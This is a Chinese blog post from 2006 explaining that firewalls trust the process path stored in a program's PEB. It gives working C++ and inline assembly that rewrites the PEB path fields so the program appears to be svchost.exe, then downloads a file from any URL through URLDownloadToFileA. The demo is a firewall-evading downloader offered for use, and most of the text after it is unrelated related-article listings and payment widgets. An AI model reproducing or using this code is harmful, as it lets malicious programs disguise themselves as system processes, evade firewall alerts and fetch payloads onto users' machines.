防火墙普遍存在的设计缺陷--关于进程路径的获取

最新推荐文章于 2025-01-22 00:15:00 发布
最新推荐文章于 2025-01-22 00:15:00 发布
阅读量2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 病毒安全 C++/ASM 文章标签: 防火墙 path parameters null user 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RonCha/article/details/1254982
本文介绍了一种通过修改程序PEB中的路径信息来伪装成系统进程(svchost.exe)的方法,以此绕过防火墙的检测。这种方法适用于希望隐藏真实路径的程序,通过汇编指令实现路径替换。

作者:RonCha
主页:http://blog.youkuaiyun.com/RonCha/
当程序访问网络时,一般情况下防火墙都会获取到程序的路径,并提示用户。
问题就出在获取程序路径的方法,一般的防火墙程序都是直接在ring3下获取这些信息,也就是说防火墙程序获取的这些信息,基本上是程序的PEB中存放的信息。如果我们修改了程序的PEB中相关的路径的信息的话,把程序修改伪装为系统进程的路径的话,防火墙就无法正确识别了。

DEMO代码如下,如需更完整的信息请与我联系:

//  fuckdown.cpp : Defines the entry point for the console application.
 //
//   [9/19/2006 RonCha]
#include  " stdafx.h "
#include  < urlmon.h >
#pragma  comment(lib,"urlmon.lib")

char  szpath[MAX_PATH] = {0} ;
OLECHAR path[MAX_PATH] = {0} ;


 void  ChangPath();

 int  main( int  argc,  char *  argv[])
 {

    //修改路径
    ChangPath();
    if (argc==3)
    {
         if (argv[1]!="" && argv[2]!="")
         {
            HRESULT hRet=URLDownloadToFileA(NULL,argv[1],argv[2],NULL,NULL);
            if(hRet==S_OK)
                printf(" Down Success! ");
            else
                printf(" Can't down the file! ");
            return 1;
         }
    }
    printf("Author:RonCha ");
    printf("Web:http://blog.youkuaiyun.com/RonCha ");
    printf("Usage:fuckdown.exe downurl savepath ");
    return 0;
}

void  ChangPath()
 {
    //将该进程伪装为svchost.exe
    int slen;
    slen=GetSystemDirectory(szpath,MAX_PATH);
    slen=GetSystemDirectory(szpath,slen);
    lstrcat(szpath,"/svchost.exe");
    //转化为Unicode字符
    MultiByteToWideChar(CP_ACP,NULL,szpath,-1,path,MAX_PATH);
    __asm
    {            
            MOV EAX, fs:[30h]            //get the PEB address
            MOV EAX, [EAX+0xC]             //_PEB_LDR_DATA
            MOV EAX, [EAX+0xC]             //InLoadOrderModuleList
            lea ebx,path
            mov WORD ptr[EAX+0x24],0x60  //FullDllName->Length
            mov [EAX+0x28],ebx             //FullDllName->Buffer
            MOV EAX, fs:[30h]
            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea EAX,[EAX+0x3c]             //_RTL_USER_PROCESS_PARAMETERS ->ImagePathName->Buffer
            lea ebx,path
            mov [eax],ebx                 //ImagePathName->Buffer
            mov WORD ptr[eax-4],0x60     //ImagePathName->Length
            MOV EAX, fs:[30h]
            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea eax,[EAX+0x44]             //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
            lea ebx,path
            mov [eax],ebx                //CommandLine-->Buffer
            mov WORD ptr[eax-4],0x60    //CommandLine-->Length
    }
}

 

2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
Aluxian_的博客
05-11 2万+
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分) 模块A 基础设施设置与安全加固(20分) 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录安全加固、数据库安全策略、流量完整性策略、事件监控策略、防火墙策略、IP协议安全配置等多种安全策略来提升服务器系
❗别再看散装笔记!软考中级章节系统拆解之软件设计-知识点计算机技术与软件中级考试-软件设计师备考
最新发布
qq_1905369638
04-29 964
1、软件分层:2、操作系统功能:管理系统的硬件、软件、数据资源。控制程序运行。人机之间的接口。应用软件与硬件之间的接口。3、嵌入式操作系统特点:微型化、实时性、可靠性、可定制、易移植等可定制:从减少成本和缩短研发周期考虑,要求嵌入式操作系统能运行在不同的微处理器平台上,能针对硬件变化进行结构与功能上的配置,以满足不同应用需要。
c++ 防火墙设计模式PImpl
流媒体巅峰之路
09-24 1061
编译防火墙~PImpl [3] CrazyRabbit 人民广场放鸽子大赛唯一到场选手 PImpl(Pointer to implementation)是一种C++编程技术,其通过将类的实现的详细信息放在另一个单独的类中,并通过不透明的指针来访问。这项技术能够将实现的细节从其对象中去除,还能减少编译依赖。有人将其称为“编译防火墙(Compilation Firewalls)”。 Herb Sutter(C++标准委员会成员)写了一些相关的博客,对其博客做一个翻译记录: GotW #7a Sol
Linux防火墙firewalld安全设置
m0_59598029的博客
01-11 1193
防火墙是指设置在不同网络网络安全域之间的一系列部件的组合,它能增强机构内部网络的安全性。它通过访问控制机制,确定哪些内部服务允许外部访问,以及允许哪些外部请求可以访问内部服务。它可以根据网络传输的类型决定IP包是否可以传进或传出内部网。防火墙通过审查经过的每一个数据包,判断它是否有相匹配的过滤规则,根据规则的先后顺序进行一一比较,直到满足其中的一条规则为止,然后依据控制机制做出相应的动作。如果都不满足,则将数据包丢弃,从而保护网络的安全。Linux系统的防火墙功能是由内核实现的。
计算机网络 - iptables 防火墙
qq_48391148的博客
04-06 2565
目录 1. iptables 的四表五链 1.1 规则链 1.1.1 默认的5种规则链 1.1.2 规则链间的匹配顺序 1.1.3 规则链内的匹配顺序 1.2 规则表 1.2.1 默认的4个规则表 1.2.2 规则表之间的优先顺序 1.3 数据包过滤匹配流程 2. iptables命令的语法格式 2.1 设置规则内容: 2.2 列表查看规则 2.3 清除规则 2.4 策略: 2.5 定时清除iptables规则 2.6 自定义规则链 2....
c++防火墙代码
SYC20110120的博客
07-31 1365
这个防火墙类有一个构造函数,它需要一个允许的IP地址向量,并将其存储。它还有一个is_allowed()`方法,它接受一个IP地址,并将该地址与允许的地址进行比较。如果提供的IP是一个允许的IP,则返回true,否则返回false。在主函数中,我们实例化了一个防火墙对象并指定允许的IP地址。然后,我们要求用户提供一个IP地址,并使用`is_allowed()方法检查该地址是否允许访问。最后,我们输出一个访问授权或拒绝的消息。
基于VC++包过滤技术防火墙设计与实现
毕业作品网站
10-27 1695
这种技术是在网络中适当的位置对数据包实施有选择的通过,选择依据,即为系统内设置的过滤规则(通常称为访问控制表-----Access Control List),只有满足过滤规则的数据包才被转发至相应的网络接口,其余数据包则被从数据流中删除。本文主要研究个人安全防御系统中包过滤系统的设计与实现,通过对现有包过滤技术深入的研究与分析,发现其中的不足之处,并在设计实现的过程中对其进行改进和完善。1全面深入的研究现有的包过滤技术,分析比较每一种包过滤技术的优缺点,结合个人安全防御系统的特点确定所要使用的技术。
软考中级-软件设计师 知识点整理(一篇就过了 建议收藏)
热门推荐
片言可决讼,半纸能缚龙
09-23 15万+
软考中级-软件设计师上午题知识点总结
ps aux | grep soffice能查到进程存在 netstat -tulnp | grep :8100没有输出 应该是端口未监听 该怎么处理?
03-08
好的,我现在需要帮助用户解决他们的问题,即运行了OpenOffice的服务,进程存在但端口未监听的情况。用户已经执行了ps aux | grep soffice确认进程存在,但netstat -tulnp | grep :8100没有输出,说明端口未被监听。...
软考高级--网络规划设计师(六)--网络安全
辣椒炒肉的博客
09-16 1534
通过使用一对密钥(公钥和私钥)来实现数据的加密和解密,从而确保数据的安全性和完整性。VPN 是指利用公共网络建立私有专用网络,数据通过安全的“加密隧道”在公共网络中传播,连接在 Internet 上的位于不同地方的两个或多个企业内部网之间建立一条专有的通信线路,就像是架设了一条专线一样,但是它并不需要真正去敷设光缆之类的物理线路。数字证书包含用户的公钥和认证机构的数字签名,用户可以利用认证机构的公钥验证数据签名确认证书的真伪,然后就可以利用证书中的用户公钥进行数据的加密。
C++ API拦截源码
09-21
C++ API拦截源码 修改导入表 自己看一下,要改的地方改一下,很不错的例子
用C、C++完整防火墙源代码
01-13
Xfilter 源代码完整的文件列表 ------------------------------------------------------ .\Common .\Lib .\Property .\Release .\TcpIpDog .\Xfilter.dsw .\readme.txt .\filelist.txt .\Common\XLogFile.h .\Common\XLogFile.cpp .\Common\XInstall.cpp .\Common\XFile.h .\Common\XInstall.h .\Common\XFile.cpp .\Common\Debug.h .\Common\XFileRes.h .\Lib\htmlhelp.h .\Lib\htmlhelp.lib .\Property\Property.opt .\Property\Property.aps .\Property\Property.dsp .\Property\Property.rc .\Property\Property.clw .\Property\ReadMe.txt .\Property\resource.h .\Property\NetIPAria.h .\Property\GuiRes.h .\Property\AclSet.cpp .\Property\SetTime.h .\Property\Acl.cpp .\Property\SetNet.h .\Property\MainSheet.h .\Property\AclSet.h .\Property\Register.h .\Property\SystemSet.cpp .\Property\Splash.h .\Property\Property.dsw .\Property\Acl.h .\Property\Property.ncb .\Property\Splash.cpp .\Property\Property.h .\Property\LogQuery.h .\Property\SetTime.cpp .\Property\MainSheet.cpp .\Property\SetNet.cpp .\Property\NetIPAria.cpp .\Property\About.cpp .\Property\StdAfx.h .\Property\StdAfx.cpp .\Property\SystemSet.h .\Property\Register.cpp .\Property\About.h .\Property\LogQuery.cpp .\Property\Property.cpp .\Property\NetTimeSheet.h .\Property\PacketMonitor.h .\Property\Property.plg .\Property\NetTimeSheet.cpp .\Property\PacketMonitor.cpp .\Property\Internet .\Property\MainFrame .\Property\SystemTray .\Property\res .\Property\HyperLink .\Property\Internet\Internet.cpp .\Property\Internet\Internet.h .\Property\MainFrame\MainFrame.cpp .\Property\MainFrame\mainframe.h .\Property\SystemTray\SystemTray.cpp .\Property\SystemTray\SystemTray.h .\Property\res\Property.rc2 .\Property\res\NULL.ico .\Property\res\Property.ico .\Property\res\about.bmp .\Property\res\Alert.ico .\Property\res\DenyEx1.ico .\Property\res\PassEx1.ico .\Property\res\QueryEx1.ico .\Property\res\splash.bmp .\Property\res\MEMO.ICO .\Property\res\ALERTSET.ICO .\Property\res\APPSET.ICO .\Property\res\BASESET.ICO .\Property\res\COMMONSET.ICO .\Property\res\Monitor.ico .\Property\res\NETSET.ICO .\Property\res\SUPERSET.ICO .\Property\res\TIMESET.ICO .\Property\res\Xfilter.ico .\Property\res\IPSET.ICO .\Property\res\Email.ico .\Property\res\QueryResult.ico .\Property\res\QuerySet.ICO .\Property\res\UserInfo.ico .\Property\res\ACLSET.ICO .\Property\res\Message.ico .\Property\HyperLink\HyperLink.cpp .\Property\HyperLink\HyperLink.h .\Release\xacl.cfg .\Release\Xfilter.chm .\Release\Xfilter.exe .\Release\Xfilter.dll .\Release\xlog.dat .\TcpIpDog\StdAfx.cpp .\TcpIpDog\TcpIpDog.dsp .\TcpIpDog\LspServ.def .\TcpIpDog\ReadMe.txt .\TcpIpDog\CheckAcl.cpp .\TcpIpDog\TcpIpdog.cpp .\TcpIpDog\Codes.h .\TcpIpDog\TcpIpDog.h .\TcpIpDog\ProtocolInfo.h .\TcpIpDog\CheckAcl.h .\TcpIpDog\StdAfx.h .\TcpIpDog\ProtocolInfo.cpp .\TcpIpDog\TcpIpDog.plg
用C++ 实现 防火墙
07-08
用c++ 实现的防火墙 ,绝对能用,大家参考~~
C++ 防火墙代码
01-19
C++防火墙代码 此程序的核心技术是抓包分析包限制不符合规则的包进入主机,它工作在传输层,它具备的功能: 1.根据安全规则对进出网络的数据包进行过滤; 2.根据应用程序访问规则对应用程序连网动作进行过滤; 3.对应用程序访问规则具有自学习功能; 4.可实时监控、监视网络活动; 5.日志记录网络访问动作的详细信息;
C++网络编程实例文件之第十一章 防火墙设计与实现
03-05
C++网络编程实例文件,里面包含各个章节的C++源码。 第一章 网络通信基础 第二章 认识Windows编程模型 第三章 网络基本应用在VC++中的实现 第四章 串口通信及其实例 第五章 应用层协议及编程实例 第六章 传输层协议及编程实例 第七章 网络层协议和数据链路层 第八章 Internet通信原理以及编程实例 第九章 基于Windows API的虚拟终端实现 第十章 多线程网络文件传输的设计与实现 第十一章 防火墙设计与实现 第十二章 邮件转发器 第十三章 telnet bbs
windows防火墙添加规则
weixin_30410119的博客
03-07 567
#include <windows.h> #include <crtdbg.h> #include <netfw.h> #include <objbase.h> #include <oleauto.h> #include <stdio.h> #pragma comment( lib, "ole32.lib"...
2024年C C++最全【Linux】防火墙 iptables_iptable 能限制的协议,研发4面真题解析(C C++岗)
2401_84973151的博客
05-13 415
讲解视频,并且后续会持续更新**
c++————又是防火墙
numberjk的博客
01-01 176
【代码】c++————又是防火墙
vc++实现应用程序添加防火墙白名单(附带源码)
欢迎来到我的博客!这里是一个专注于计算机技术的分享平台,涵盖编程开发、算法研究、系统架构、软件工程等多个领域。无论你是初学者还是资深开发者,都能在这里找到有价值的内容。
01-22 512
在 Windows 操作系统中,防火墙规则的管理通常需要使用 Windows 防火墙 API。VC++ 提供了一些方法,通过调用 Windows API 来实现防火墙规则的添加或修改。我们可以通过设置应用程序的防火墙白名单来允许应用程序的网络访问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值